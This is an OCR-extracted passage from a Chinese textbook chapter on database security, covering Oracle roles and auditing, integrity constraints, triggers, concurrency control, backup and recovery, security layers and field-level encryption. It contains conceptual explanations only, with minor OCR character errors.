相应 的 角色 分 别称 为 应 用 角色 和 用 户 角色 。 
@ 应 用 角色 是 系统 授予 的 运行 一 组 数据 库 应 用 所 需 的 全 部 特权 。 一 个 应 用 角色 可 授 
了 予 其 他 角色 或 指定 用 户 。 一 个 应 用 可 有 几 种 不 同 角色 ， 具 有 不 同 特权 组 的 每 一 个 角色 在 使 
用 应 用 时 可 进行 不 同 的 数据 存 取 。 

@ 用 户 角 色 是 为 具有 公开 特权 需求 的 一 组 数据 库 用 户 而 建立 的 。 

(2) 数据 库 角色 的 功能 

@ 一 个 角色 可 被 授予 系统 特权 或 对 象 特权 。 

@ 一 个 角色 可 授权 给 其 他 角色 ， 但 不 能 循环 授权 。 

@ 任何 角色 可 授权 给 任何 数据 库 用 户 。 

@ 授权 给 一 个 用 户 的 每 一 角色 可 以 是 可 用 的 ， 也 可 以 是 不 可 用 的 。 

@ 一 个 间接 授权 角色 (授权 给 另 一 角色 的 角色 ) 对 一 个 用 户 可 明确 其 可 用 或 不 可 用 。 

@ 在 一 个 数据 库 中 ， 每 一 个 角色 名 是 唯一 的 。 

3. 审计 
审计 是 对 选 定 的 用 户 动作 的 监控 和 记录 ， 通 常用 于 审查 可 疑 的 活动 、 监 视 和 收集 关于 
指定 数据 库 活 动 的 数据 。 

1) Oracle 支持 的 3 种 审计 类 型 

(1) 语句 审计 。 语 句 审计 是 指 对 某 种 类 型 的 SQL 语句 进行 的 审计 ， 不 涉及 具体 的 对 
象 。 这 种 审计 既 可 对 系统 的 所 有 用 户 进行 ， 也 可 对 部 分 用 户 进行 。 

(2) 特权 审计 。 特 权 审计 是 指 对 执行 相应 动作 的 系统 特权 进行 的 审计 ， 不 涉及 有 具体 对 
象 。 这 种 审计 也 是 既 可 对 系统 的 所 有 用 户 进行 ， 也 可 对 部 分 用 户 进行 。 

(3) 对 象 审计 。 对 象 审计 是 指 对 特殊 模式 对 象 的 访问 情况 的 审计 ， 不 涉及 具体 用 户 ， 
是 监控 有 对 象 特权 的 SQL 语句 。 

2) Oracle 允许 的 审计 选择 范围 

(1) 审计 语句 的 成 功 执行 、 不 成 功 执行 ， 或 其 两 者 都 包括 。 

(2) 对 每 一 用 户 会 话 审 计 语 句 的 执行 审计 一 次 或 对 语句 的 每 次 执行 审计 一 次 。 
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(3) 审计 全 部 用 户 或 指定 用 户 的 活动 。 

当 数 据 库 的 审计 是 可 能 时 ， 在 语句 执行 阶段 产生 审计 记录 。 审 计 记 录 包 含有 审计 的 操 
作 、 用 户 执行 的 操作 、 操 作 的 日 期 和 时 间 等 信息 。 审 计 记录 可 存放 于 数据 字典 表 ( 称 为 审计 
记录 ) 或 操作 系统 审计 记录 中 。 


9.2.2 数据库 的 完整 性 


数据 库 的 完整 性 是 指 保护 数据 库 数据 的 正确 性 和 一 致 性 。 它 反映 了 现实 中 实体 的 本 来 
面貌 。 数 据 库 系统 要 提供 保护 数据 完整 性 的 功能 。 系 统 用 一 定 的 机 制 检 查 数据 库 中 的 数据 
是 否 满足 完整 性 约束 条 件 。Oracle 应 用 于 关系 型 数据 库 的 表 的 数据 完整 性 有 下 列 类 型 。 

@ 。 空 与 非 空 规则 。 在 插入 或 修改 表 的 行 时 允许 或 不 允许 包含 有 空 值 的 列 。 

@ 唯一 列 值 规则 。 人 允许 插入 或 修改 表 的 行 在 该 列 上 的 值 唯一 。 
@ ”引用 完整 性 规则 。 
@ ”用 户 定义 规则 。 

Oracle 允许 定义 和 实施 每 一 种 类 型 的 数据 完整 性 规则 ， 如 空 与 非 空 规则 、 唯 一 列 值 规 

则 和 引用 完整 性 规则 等 ， 这 些 规则 可 用 完整 性 约束 和 数据 库 触发 器 来 定义 。 


1. 完整 性 约束 


1) 完整 性 约束 条 件 

完整 性 约束 条 件 是 作为 模式 的 一 部 分 ， 对 表 的 列 定 义 的 一 些 规则 的 说 明 性 方法 。 具 有 
定义 数据 完整 性 约束 条 件 功 能 和 检查 数据 完整 性 约束 条 件 方法 的 数据 库 系统 可 实现 对 数据 
完整 性 的 约束 。 

完整 性 约束 有 数值 类 型 与 值 域 的 完整 性 约束 、 关 键 字 的 约束 、 数 据 联系 (结构 ) 的 约束 
等 。 这 些 约束 都 是 在 稳定 状态 下 必须 满足 的 条 件 ， 叫 静态 约束 。 相 应 地 还 有 动态 约束 ， 指 
数据 库 中 的 数据 从 一 种 状态 变 为 另 一 种 状态 时 ， 新 旧 数 值 之 间 的 约束 ， 如 更 新 人 的 年 龄 时 
新 值 不 能 小 于 旧 值 等 。 

2) 完整 性 约束 的 优点 

利用 完整 性 约束 实施 数据 完整 性 规则 有 以 下 优点 。 

(1) 定义 或 更 改 表 时 ， 不 需要 程序 设计 便 可 很 容易 地 编写 程序 并 可 消除 程序 性 错误 ， 
其 功能 由 Oracle 控制 。 

(2) 对 表 所 定义 的 完整 性 约束 被 存储 在 数据 字典 中 ， 所 以 由 任何 应 用 进入 的 数据 都 必 
须 遵 守 与 表 相关 联 的 完整 性 约束 。 

(3) 具有 最 大 的 开发 能 力 。 当 由 完整 性 约束 所 实施 的 事务 规则 改变 时 ， 管 理 员 只 需 改 
变 完整 性 约束 的 定义 ， 所 有 应 用 自动 地 遵守 所 修改 的 约束 。 

(4) 完整 性 约束 存储 在 数据 字典 中 ， 数 据 库 应 用 可 利用 这 些 信息 ， 在 SQL 语句 执行 之 
前 或 Oracle 检查 之 前 ， 就 可 立即 反馈 信息 。 

(5) 完整 性 约束 说 明 的 语义 被 清楚 地 定义 ， 对 于 每 一 指定 的 说 明 规 则 可 实现 性 能 优化 。 

(6) 完整 性 约束 可 临时 地 使 其 不 可 用 ， 使 之 在 装 入 大 量 数据 时 避免 约束 检索 的 开销 。 
当 数 据 库 装 入 完成 时 ， 完 整 性 约束 可 容易 地 使 其 可 用 ， 任 何 破坏 完整 性 约束 的 新 记录 可 在 
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另外 的 表 中 列 出 。 

2. 数据 库 触发 器 

1) 触发 器 的 定义 

数据 库 触发 器 是 使 用 非 说 明 方法 实施 的 数据 单元 操作 过 程 。 利 用 数据 库 触 发 器 可 定义 
和 实施 任何 类 型 的 完整 性 规则 。 
Oracle 允许 定义 过 程 ， 当 对 相关 的 表 进 行 insert、update 或 delete 语句 操作 时 ， 这 些 过 
程 被 隐 式 地 执行 ， 这 些 过 程 就 称 为 数据 库 触 发 器 。 触 发 器 类 似 于 存储 过 程 ， 可 包含 SQL 语 
句 和 PL / SQL 语句 ， 并 可 调用 其 他 的 存储 过 程 。 过 程 与 触发 器 的 差别 在 于 其 调用 方法 : 
过 程 由 用 户 或 应 用 显 式 地 执行 ， 而 触发 器 是 为 一 个 激发 语句 (insert、update、delete) 发 出 而 
由 Oracle 隐 式 地 触发 。 一 个 数据 库 应 用 可 隐 式 地 触发 存储 在 数据 库 中 的 多 个 触发 器 。 

2) 触发 器 的 组 成 

一 个 触发 器 由 三 部 分 组 成 ， 即 触发 事件 或 语句 、 触 发 限制 和 触发 器 动作 。 触 发 事件 或 
语句 是 指引 起 激发 触发 器 的 SQL 语句 ， 可 为 对 一 个 指定 表 的 insert、update 或 delete 语 
句 。 触 发 限制 是 指定 一 个 布尔 表达 式 ， 当 触发 器 激发 时 该 布尔 表达 式 必 须 为 真 。 触 发 器 作 
为 过 程 ， 是 PL / SQL 块 ， 当 触发 语句 发 出 、 触 发 限制 计算 为 真 时 该 过 程 被 执行 。 

3) 触发 器 的 功能 

在 许多 情况 中 触发 器 补充 Oracle 的 标准 功能 ， 提 供 高 度 专用 的 数据 库 管 理 系 统 。 一 般 
触发 器 用 于 实现 以 下 目的 。 

(1) 自动 地 生成 导出 列 值 。 

(2) 实施 复杂 的 安全 审核 。 

(3) 在 分 布 式 数 据 库 中 实施 跨 节点 的 完整 性 引用 。 

(4) 实施 复杂 的 事务 规则 。 

(5) 提供 透明 的 事件 记录 。 

(6) 提供 高 级 的 审计 。 

(7) 收集 表 存 取 的 统计 信息 。 


9.2.3 数据库 的 并 发 控制 


数据 库 是 一 种 共享 资源 库 ， 可 为 多 个 应 用 程序 所 共享 。 在 许多 情况 下 ， 由 于 应 用 程序 
涉及 的 数据 量 可 能 很 大 ， 常 常会 涉及 输入 输出 的 交换 。 为 了 有 效 地 利用 数据 库 资 源 ， 可 能 
多 个 程序 或 一 个 程序 的 多 个 进程 并 行 地 运行 ， 这 就 是 数据 库 的 并 发 操作 。 

在 多 用 户 数据 库 环境 中 ， 多 个 用 户 程序 可 并 行 地 存 取 数 据 。 并 发 控制 是 指 在 多 用 户 的 
环境 下 ， 对 数据 库 的 并 行 操作 进行 规范 的 机 制 ， 其 目的 是 为 了 避免 数据 的 丢失 修改 、 无 效 
数据 的 读 出 与 不 可 重复 读数 据 等 ， 从 而 保证 数据 的 正确 性 与 一 致 性 。 并 发 控制 在 多 用 户 的 
模式 下 是 十 分 重要 的 ， 但 这 一 点 经 常 被 一 些 数据 库 应 用 人 员 忽视 ， 而 且 因 为 并 发 控制 的 层次 
和 类型 非常 丰富 和 复杂 ， 有 时 使 在 选择 时 比较 迷惑 ， 不 清楚 衡量 并 发 控制 的 原则 和 途径 。 

1. 一 致 性 和 实时 性 

一 致 性 的 数据 库 就 是 指 并 发 数据 处 理 响应 过 程 已 完成 的 数据 库 。 例 如 ， 一 个 会 计数 据 
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库 ， 当 它 的 记 入 借方 与 相应 的 贷方 记录 相 匹 配 的 情况 下 ， 它 就 是 数据 一 致 的 。 

一 个 实时 的 数据 库 就 是 指 所 有 的 事务 全 部 执行 完毕 后 才 响应 。 如 果 一 个 正在 运行 数据 
库 管理 的 系统 出 现 了 故障 而 不 能 继续 进行 数据 处 理 ， 原 来 事务 的 处 理 结果 还 存在 缓存 中 而 
没有 写 入 到 磁盘 文件 中 ， 当 系统 重新 启动 时 ， 系 统 数据 就 是 非 实时 性 的 。 

数据 库 日 志 用 来 在 故障 发 生 后 恢复 数据 库 时 保证 数据 库 的 一 致 性 和 实时 人 性。 

2. 数据 的 不 一 致 现象 


事务 并 发 控制 不 当 ， 可 能 会 产生 丢失 修改 、 读 无 效 数据 、 不 可 重复 读 等 数据 不 一 致 


现象 。 
(1) 丢失 修改 。 

丢失 数据 是 指 一 个 事务 的 修改 覆盖 了 另 一 个 事务 的 修改 ， 使 前 一 个 修改 丢失 。 比 如 两 
个 事务 Tl1 和 T2 读 入 同一 数据 ，T2 提交 的 结果 破坏 了 T1 提交 的 数据 ， 使 TI 对 数据 库 的 
修改 丢失 ， 造 成 数据 库 中 的 数据 错误 。 

(2) 无 效 数据 的 读 出 。 

无 效 数据 的 读 出 是 指 不 正确 数据 的 读 出 。 比 如 事务 T1 将 某 一 值 修改 ， 然 后 事务 T2 读 
该 值 ， 此 后 Tl 由 于 某 种 原因 撤销 对 该 值 的 修改 ， 这 样 就 造成 T2 读 取 的 数据 是 无 效 的 。 

(3) 不 可 重复 读 。 

在 一 个 事务 范围 内 ， 两 个 相同 的 查询 却 返 回 了 不 同 数据 ， 这 是 由 于 查询 时 系统 中 其 他 
事务 修改 的 提交 而 引起 的 。 比 如 事务 TI 读 取 某 一 数据 ， 事 务 T2 读 取 并 修改 了 该 数据 ，TI 
为 了 对 读 取 值 进行 检验 而 再 次 读 取 该 数据 ， 便 得 到 了 不 同 的 结果 。 

但 在 应 用 中 为 了 提高 并 发 度 ， 可 以 容忍 一 些 不 一 致 现 象 。 例 如 ， 大 多 数 业务 经 适当 的 
调整 后 可 以 容忍 不 可 重复 读 。 当 今 流行 的 关系 数据 库 系统 (如 Oracle、SQL Server 等 ) 是 通 
过 事务 隔离 与 封锁 机 制 来 定义 并 发 控制 所 要 达到 的 目标 的 ， 根 据 其 提供 的 协议 ， 可 以 得 到 
几乎 任何 类 型 的 合理 的 并 发 控制 方式 。 

并 发 控制 数据 库 中 的 数据 资源 必须 具有 共享 属性 。 为 了 充分 利用 数据 库 资源 ， 应 允许 
多 个 用 户 并 行 操作 数据 库 。 数 据 库 必须 能 对 这 种 并 行 操 作 进行 控制 ， 以 保证 数据 在 不 同 的 
用 户 使 用 时 的 一 致 性 。 

3. 并 发 控制 的 实现 

并 发 控制 的 实现 途径 有 多 种 ， 如 果 DBMS 支持 ， 当 然 最 好 是 运用 其 自身 的 并 发 控制 能 
力 。 如 果 系 统 不 能 提供 这 样 的 功能 ， 可 以 借助 开发 工具 的 支持 ， 还 可 以 考虑 调整 数据 库 
用 程序 ， 有 时 可 以 通过 调整 工作 模式 来 避 开 这 种 会 影响 效率 的 并 发 操作 。 

并 发 控制 能 力 是 指 多 用 户 在 同一 时 间 对 相同 数据 同时 访问 的 能 力 。 一 般 的 关系 型 数据 
库 都 具有 并 发 控制 能 力 ， 但 是 这 种 并 发 功能 也 会 对 数据 的 一 致 性 带 来 危险 。 试 想 ， 若 有 两 
个 用 户 都 试图 访问 某 个 银行 用 户 的 记录 ， 并 同时 要 求 修改 该 用 户 的 存款 余额 时 ， 情 况 将 会 
怎样 呢 ? 


9.2.4 数据 库 的 恢复 
当 使 用 一 个 数据 库 时 ， 总 希望 数据 库 的 内 容 是 可 靠 的 、 正 确 的 ， 但 由 于 计算 机 系统 的 
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故障 (硬件 故障 、 软 件 故 障 、 网 络 故 障 、 进 程 故障 和 系统 故障 等 ) 影 响 数据 库 系统 的 操作 ， 
影响 数据 库 中 数据 的 正确 性 ， 甚 至 破坏 数据 库 ， 使 数据 库 中 数据 全 部 或 部 分 丢失 。 因 此 当 
发 生 上 述 故 障 后 ， 希 望 能 尽快 恢复 到 原 数据 库 状 态 或 重新 建立 一 个 完整 的 数据 库 ， 该 处 理 
称 为 数据 库 恢复 。 数 据 库 恢复 子 系统 是 数据 库 管 理 系统 的 一 个 重要 组 成 部 分 。 具 体 的 恢复 
处 理 因 所 发 生 的 故障 类 型 所 影响 的 情况 和 结果 而 变化 。 


1. 操作 系统 备份 


不 管 为 Oracle 数据 库 设 计 什么 样 的 恢复 模式 ， 数 据 库 数据 文件 、 日 志文 件 和 控制 文件 
的 操作 系统 备份 都 是 绝对 需要 的 ， 它 是 保护 介质 故障 的 策略 。 操 作 系统 备份 分 为 完全 备份 
和 部 分 备份 。 

1) 完全 备份 

完全 备份 将 构成 Oracle 数据 库 的 全 部 数据 库 文 件 、 在 线 日 志文 件 和 控制 文件 的 一 个 操 
作 系统 备份 。 一 个 完全 备份 在 数据 库 正 常 关 闭 之 后 进行 ， 不 能 在 实例 故障 后 进行 。 此 时 ， 
所 有 构成 数据 库 的 全 部 文件 是 关闭 的 ， 并 与 当前 状态 相 一 致 。 在 数据 库 打开 时 不 能 进行 完 
全 备份 。 由 完全 备份 得 到 的 数据 文件 在 任何 类 型 的 介质 恢复 模式 中 都 是 有 用 的 。 

2) 部 分 备份 
部 分 备份 是 除 完 全 备份 外 的 任何 操作 系统 备份 ， 可 在 数据 库 打 开 或 关闭 状态 下 进行 。 
如 单个 表 空间 中 全 部 数据 文件 的 备份 、 单 个 数据 文件 的 备份 和 控制 文件 的 备份 。 部 分 备份 
仅 对 在 归档 日 志方 式 下 运行 数据 库 有 用 ， 数 据 文件 可 由 部 分 备份 恢复 ， 在 恢复 过 程 中 与 数 
据 库 其 他 部 分 一 致 。 

通过 正规 备份 ， 并 且 快 速 地 将 备份 介质 运送 到 安全 的 地 方 ， 数 据 库 就 能 够 在 大 多 数 的 
灾难 中 得 到 恢复 。 恢 复 是 文件 的 使 用 从 一 个 基点 的 数据 库 映 像 开始 ， 到 一 些 综合 的 备份 和 
日 志 。 由 于 不 可 预知 的 物理 灾难 ， 一 个 完全 的 数据 库 恢复 ( 重 应 用 日 志 ) 可 以 使 数据 库 映 像 
恢复 到 尽 可 能 接近 灾难 发 生 的 时 间 点 的 状态 。 对 于 逻辑 灾难 ， 如 和 人 为 破坏 或 者 应 用 故障 
等 ， 数 据 库 映像 应 该 恢复 到 错误 发 生前 的 那 一 点 。 

在 一 个 数据 库 的 完全 恢复 过 程 中 ， 基 点 后 所 有 日 志 中 的 事务 被 重新 应 用 ， 所 以 结果 就 
是 一 个 数据 库 映 像 反映 所 有 在 灾难 前 已 接受 的 事务 ， 而 没有 被 接受 的 事务 则 不 被 反映 。 数 
据 库 恢复 可 以 恢复 到 错误 发 生前 的 最 后 一 个 时 刻 。 


2. 介质 故障 的 恢复 


介质 故障 是 当 一 个 文件 、 文 件 的 一 部 分 或 一 块 磁盘 不 能 读 或 不 能 写 时 出 现 的 故障 。 介 
质 故 障 的 恢复 有 以 下 两 种 形式 ， 由 数据 库 运 行 的 归档 方式 决定 。 

@ 如 果 数 据 库 是 可 运行 的 ， 它 的 在 线 日 志 仅 可 重用 但 不 能 归档 ， 此 时 介质 恢复 可 使 
用 最 新 的 完全 备份 的 简单 恢复 。 

@ 如 果 数 据 库 可 运行 且 其 在 线 日 志 是 可 归档 的 ， 该 介质 故障 的 恢复 是 一 个 实际 恢复 
过 程 ， 需 重 构 受 损 的 数据 库 ， 恢 复 到 介质 故障 前 的 一 个 指定 事务 状态 。 

不 管 哪 种 方式 ， 介 质 故 障 的 恢复 总 是 将 整个 数据 库 恢 复 到 故障 前 的 一 个 事务 状态 。 
如 果 数 据 库 是 在 归档 日 志方 式 下 运行 ， 可 采用 完全 介质 恢复 和 不 完全 介质 恢复 两 种 方式 
进行 。 
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1) 完全 介质 恢复 

完全 介质 恢复 可 恢复 全 部 丢失 的 修改 。 仅 当 所 有 必要 的 日 志 可 用 时 才 可 能 这 样 做 。 可 
使 用 不 同类 型 的 完全 介质 恢复 ， 这 要 取决 于 损坏 的 文件 和 数据 库 的 可 用 性 。 

(1) 关闭 数据 库 的 恢复 。 当 数据 库 可 被 装配 但 是 关闭 时 ， 完 全 不 能 正常 使 用 ， 此 时 
进行 全 部 的 或 单个 损坏 数据 文件 的 完全 介质 恢复 。 

(2) 打开 数据 库 的 离线 表 空 间 的 恢复 。 当 数据 库 是 打开 的 ， 完 全 介质 恢复 可 以 处 理 。 
未 损 的 数据 库 表 空间 在 线 时 可 以 使 用 ， 而 当 受 损 空间 离线 时 ， 其 所 有 数据 文件 可 作为 完全 
介质 恢复 的 单位 。 

(3) 打开 数据 库 的 离线 表 空 间 的 单个 数据 文件 的 恢复 。 当 数据 库 是 打开 状态 ， 完 全 介 
质 恢复 可 以 对 其 处 理 。 未 损 的 数据 库 表 空 间 处 于 在 线 状 态 时 ， 也 可 以 使 用 完全 介质 恢复 ， 
而 受 损 的 表 空 间 处 于 离线 状态 时 ， 该 表 空 间 指定 的 单个 受 损 数据 文件 可 被 恢复 。 
(4) 使 用 备份 控制 文件 的 恢复 。 当 控制 文件 的 所 有 复制 由 于 磁盘 故障 而 受 损 时 ， 可 使 
用 备份 控制 文件 进行 完全 介质 恢复 而 不 丢失 数据 。 

2) 不 完全 介质 恢复 

不 完全 介质 恢复 是 在 完全 介质 恢复 不 可 能 或 不 要 求 时 进行 的 介质 恢复 。 可 使 用 不 同类 
型 的 不 完全 介质 恢复 ， 重 构 受 损 的 数据 库 ， 使 其 恢复 到 介质 故障 前 或 用 户 出 错 前 事务 的 一 
致 性 状态 。 根据 具体 受 损 数据 的 不 同 ， 可 采用 不 同 的 不 完全 介质 恢复 。 

(1) 基于 撤销 的 不 完全 介质 恢复 。 在 某 种 情况 下 ， 不 完全 介质 恢复 必须 被 控制 ， 数 据 
库 管理 员 可 撤销 在 指定 点 的 操作 。 可 在 一 个 或 多 个 日 志 组 (在 线 的 或 归档 的 ) 已 被 介质 故障 
所 破坏 ， 不 能 用 于 恢复 过 程 时 使 用 基于 撤销 的 恢复 。 介 质 恢复 必须 控制 ， 在 使 用 最 近 的 、 
未 受 损 的 日 志 组 于 数据 文件 后 中 止 恢 复 操作 。 

(2) 基于 时 间 和 基于 修改 的 恢复 。 如 果 数 据 库 管 理 员 希望 恢复 到 过 去 的 某 个 指定 点 ， 
不 完全 介质 恢复 是 理想 的 。 当 用 户 意外 地 删除 一 个 表 ， 并 注意 到 错误 提交 的 估计 时 间 ， 数 
据 库 管理 员 可 立即 关闭 数据 库 ， 利 用 基于 时 间 的 恢复 ， 恢 复 到 用 户 错误 之 前 时 刻 。 当 出 现 
系统 故障 而 使 一 个 在 线 日 志文 件 的 部 分 被 破坏 时 ， 所 有 活动 的 日 志文 件 突然 不 能 使 用 ， 实 
例 被 中 止 ， 此 时 需要 利用 基于 修改 的 介质 恢复 。 在 这 两 种 恢复 情况 下 ， 不 完全 介质 恢复 的 
终点 可 由 时 间 点 或 系统 修改 号 (SCN) 来 指定 。 


9.3 ”数据 库 的 安全 保护 


目前 ， 计 算 机 大 批量 数据 存储 的 安全 问题 、 敏 感 数 据 的 防 窃取 和 防 算 改 问题 越 来 越 引 
起 人 们 的 重视 。 数 据 库 系统 作为 计算 机 信息 系统 的 核心 部 件 ， 数 据 库 文件 作为 信息 的 聚集 
体 ， 其 安全 性 是 非常 重要 的 。 因 此 ， 对 数据 库 数据 和 文件 进行 安全 保护 是 非常 必要 的 。 


9.3.1 数据 库 的 安全 保护 层次 


数据 库 系统 的 安全 除 依赖 其 内 部 的 安全 机 制 外 ， 还 与 外 部 网 络 环境 、 应 用 环境 、 从 业 
人 员 素 质 等 因素 有 关 ， 因 此 ， 从 广义 上 讲 ， 数 据 库 系统 的 安全 框架 可 以 划分 为 3 个 层次 。 
@ ”网 络 系统 层次 。 


[240\. 


第 9 章 ”数据库 与 数据 安全 技术 恬 


@ 操作 系统 层次 。 

@ 数据 库 管理 系统 层次 。 

这 3 个 层次 构筑 成 数据 库 系统 的 安全 体系 ， 与 数据 库 安全 的 关系 是 逐步 紧密 的 ， 防 范 
的 重要 性 也 逐 层 加 强 ， 从 外 到 内 、 由 表 及 里 保证 数据 的 安全 。 


1. 网 络 系统 层次 安全 


从 广义 上 讲 ， 数 据 库 的 安全 首先 依赖 于 网 络 系统 。 随 着 Internet 的 发 展 和 普及 ， 越 来 
越 多 的 公司 将 其 核心 业务 向 互联 网 转移 ， 各 种 基于 网 络 的 数据 库 应 用 系统 纷纷 涌现 出 来 ， 
面向 网 络 用 户 提供 各 种 信息 服务 。 可 以 说 ， 网 络 系统 是 数据 库 应 用 的 外 部 环境 和 基础 ， 数 
据 库 系 统 要 发 挥 其 强大 的 作用 离 不 开 网 络 系统 的 支持 ， 数 据 库 系统 的 用 户 ( 如 异地 用 户 、 分 
布 式 用户 ) 也 要 通过 网 络 才能 访问 数据 库 的 数据 。 网 络 系统 的 安全 是 数据 库 安 全 的 第 一 道 屏 
障 ， 外 部 入 侵 首 先 就 是 从 入 侵 网 络 系统 开始 的 。 网 络 入 侵 试图 破坏 信息 系统 的 完整 性 、 保 
密 性 或 可 信任 的 任何 网 络 活动 的 集合 。 
网 络 系统 开放 式 环境 面临 的 威胁 主要 有 欺骗 (Masquerade)、 重 发 (Replay)、 报 文 修改 、 
拒绝 服务 (DoS)、 陷 阱 门 (Trapdoor)、 特 洛 伊 木 马 (Trojanhorse)、 应 用 软件 攻击 等 。 这 些 安全 
威胁 是 无 时 无 处 不 在 ， 因 此 必须 采取 有 效 的 措施 来 保障 系统 的 安全 。 


2. 操作 系统 层次 安全 


操作 系统 是 大 型 数据 库 系 统 的 运行 平台 ， 为 数据 库 系 统 提供 了 一 定 程度 的 安全 保护 。 
目前 操作 系统 平台 大 多 为 Windows NT 和 UNIX， 安 全 级 别 通常 为 C2 级 。 主 要 安全 技术 有 
访问 控制 安全 策略 、 系 统 漏洞 分 析 与 防范 、 操 作 系统 安全 管理 等 。 

访问 控制 安全 策略 用 于 配置 本 地 计算 机 的 安全 设置 ， 包 括 密 码 策略 、 账 户 策略 、 审 核 
策略 、IP 安全 策略 、 用 户 权限 分 配 、 资 源 属性 设置 等 ， 具 体 可 以 体现 在 用 户 账户 、 口 令 、 
访问 权限 、 审 计 等 方面 。 


3. 数据 库 管理 系统 层次 安全 


数据 库 系统 的 安全 性 很 大 程度 上 依赖 于 DBMS。 如 果 DBMS 的 安全 性 机 制 非常 完善 ， 
则 数据 库 系统 的 安全 性 能 就 好 。 目 前 市 场 上 流行 的 是 关系 型 数据 库 管理 系统 ， 其 安全 性 功 
E 较 弱 ， 这 就 导致 数据 库 系 统 的 安全 性 存在 一 定 的 威胁 。 

由 于 数据 库 系统 在 操作 系统 下 都 是 以 文件 形式 进行 管理 ， 因 此 入 侵 者 可 以 直接 利用 操作 
系统 漏洞 窍 取 数 据 库 文件 ， 或 者 直接 利用 操作 系统 工具 非法 伪造 、 自 改 数据 库 文件 内 容 。 

数据 库 管 理 系统 层次 安全 技术 主要 是 用 来 解决 这 些 问 题 ， 即 当前 面 两 个 层次 已 经 被 突 
破 的 情况 下 仍 能 保障 数据 库 数据 的 安全 ， 这 就 要 求 数据 库 管理 系统 必须 有 一 套 强 有 力 的 安 
全 机 制 。 采 取 对 数据 库 文件 进行 加 密 处 理 是 解决 该 层次 安全 的 有 效 方 法 。 因 此 ， 即 使 数据 
不 慎 泄 露 或 者 丢失 ， 也 难以 被 人 破译 和 阅读 。 


9.3.2 数据库 的 审计 


对 于 数据 库 系统 ， 数 据 的 使 用 、 记 录 和 审计 是 同时 进行 的 。 审 计 的 主要 任务 是 对 应 上 
程序 或 用 户 使 用 数据 库 资源 的 情况 进行 记录 和 审查 ， 一 旦 出 现 问题 ， 审 计 人 员 对 审计 事件 
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记录 进行 分 析 ， 查 出 原因 。 因 此 ， 数 据 库 审计 可 作为 保证 数据 库 安全 的 一 种 补救 措施 。 

安全 系统 的 审计 过 程 是 记录 、 检 查 和 回顾 系统 安全 相关 行为 的 过 程 。 通 过 对 审计 记录 
的 分 析 ， 可 以 明确 责任 个 体 ， 追 查 违反 安全 策略 的 违规 行为 。 审 计 过 程 不 可 省 略 ， 审 计 记 
录 也 不 可 更 改 或 删除 。 

由 于 审计 行为 将 影响 DBMS 的 存 取 速 度 和 反馈 时 间 ， 因 此 ， 必 须 综合 考虑 安全 性 系统 
性 能 ， 按 需要 提供 配置 审计 事件 的 机 制 ， 以 允许 数据 库 管理 员 根据 具体 系统 的 安全 性 和 性 
能 需求 做 出 选择 。 这 些 可 由 多 种 方法 实现 ， 如 扩充 、 打 开 / 关闭 审计 的 SQL 语句 ， 或 使 
审计 掩 码 。 

数据 库 审计 有 用 户 审计 和 系统 审计 两 种 方式 。 

名 用 户 审计 。 进 行 用 户 审 计时 ，DBMS 的 审计 系统 记录 下 所 有 对 表 和 视图 进行 访问 
的 企图 ， 以 及 每 次 操作 的 用 户 名 、 时 间 、 操 作 代码 等 信息 。 这 些 信息 一 般 都 被 记录 在 数据 
字典 中 ， 利 用 这 些 信 息 可 以 进行 审计 分 析 。 

@ 系统 审计 。 系 统 审计 由 系统 管理 员 进 行 ， 其 审计 内 容 主要 是 系统 一 级 命令 及 数据 
库 客体 的 使 用 情况 。 

数据 库 系统 的 审计 工作 主要 包括 设备 安全 审计 、 操 作 审计 、 应 用 审计 和 攻击 审计 等 方 
。 设 备 安全 审计 主要 审查 系统 资源 的 安全 策略 、 安 全 保护 措施 和 故障 恢复 计划 等 ， 操 作 
审计 是 对 系统 的 各 种 操作 进行 记录 和 分 析 ; 应 用 审计 是 审计 建立 于 数据 库 上 整个 应 用 系统 
的 功能 、 控 制 逻 辑 和 数据 流 是 否 正确 ;攻击 审计 是 指 对 已 发 生 的 攻击 性 操作 和 危害 系统 安 
全 的 事件 进行 检查 和 审计 。 

常用 的 审计 技术 有 静态 分 析 系 统 技术 、 运 行 验证 技术 和 运行 结果 验证 技术 等 。 

为 了 真正 达到 审计 目的 ， 必 须 对 记录 了 数据 库 系 统 中 所 发 生 过 的 事件 的 审计 数据 提供 
查询 和 分 析 手 段 。 具 体 而 言 ， 审 计 分 析 要 解决 特权 用 户 的 身份 鉴别 、 审 计数 据 的 查询 、 审 
计数 据 的 格式 、 审 计 分 析 工 具 的 开发 等 问题 。 


9.3.3 数据库 的 加 密 保 护 


大 型 DBMS 的 运行 平台 (如 Windows NT 和 UNDO 一 般 都 具有 用 户 注册 、 用 户 识别 、 
任意 存 取 控 制 DAC)、 审 计 等 安全 功能 。 虽 然 DBMS 在 操作 系统 的 基础 上 增加 了 不 少 安全 
措施 (如 基于 权限 的 访问 控制 等 )， 但 操作 系统 和 DBMS 对 数据 库 文件 本 身 仍 然 缺乏 有 效 的 
保护 措施 。 有 经 验 的 网 上 黑客 也 会 绕 过 一 些 防范 措施 ， 直 接 利 用 操作 系统 工具 窃取 或 算 改 
数据 库 文件 内 容 ， 这 种 隐患 被 称 为 通 向 DBMS 的 “隐秘 通道 ”， 它 所 带 来 的 危害 一 般 数 据 
库 用 户 难以 觉察 。 

在 传统 的 数据 库 系统 中 ， 数 据 库 管 理 员 的 权力 至 高 无 上 ， 既 负责 各 项 系统 的 管理 工作 
(如 资源 分 配 、 用 户 授权 、 系 统 审计 等 )， 又 可 以 查询 数据 库 中 的 一 切 信息 。 为 此 ， 不 少 系 
统 以 种 种 手段 来 削弱 系统 管理 员 的 权力 。 

对 数据 库 中 存储 的 数据 进行 加 密 是 一 种 保护 数据 库 数据 安全 的 有 效 方法 。 数 据 库 的 数 
据 加 密 一 般 是 在 通用 的 数据 库 管理 系统 之 上 ， 增 加 一 些 加密 / 解密 控件 ， 来 完成 对 数据 本 
身 的 控制 。 与 一 般 通信 中 加 密 的 情况 不 同 ， 数 据 库 的 数据 加 密 通 常 不 是 对 数据 文件 加 密 ， 
而 是 对 记录 的 字段 加 密 。 当 然 ， 在 数据 备份 到 离线 的 介质 上 送 到 异地 保存 时 ， 也 有 必要 对 
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实现 数据 库 加 密 以 后 ， 各 用 户 (或 用 户 组 ) 的 数据 由 用 户 使 用 自己 的 密 钥 加 密 ， 数 据 库 
管理 员 对 获得 的 信息 无 法 随意 进行 解密 ， 从 而 保证 了 用 户 信息 的 安全 。 另 外 ， 通 过 加 密 ， 
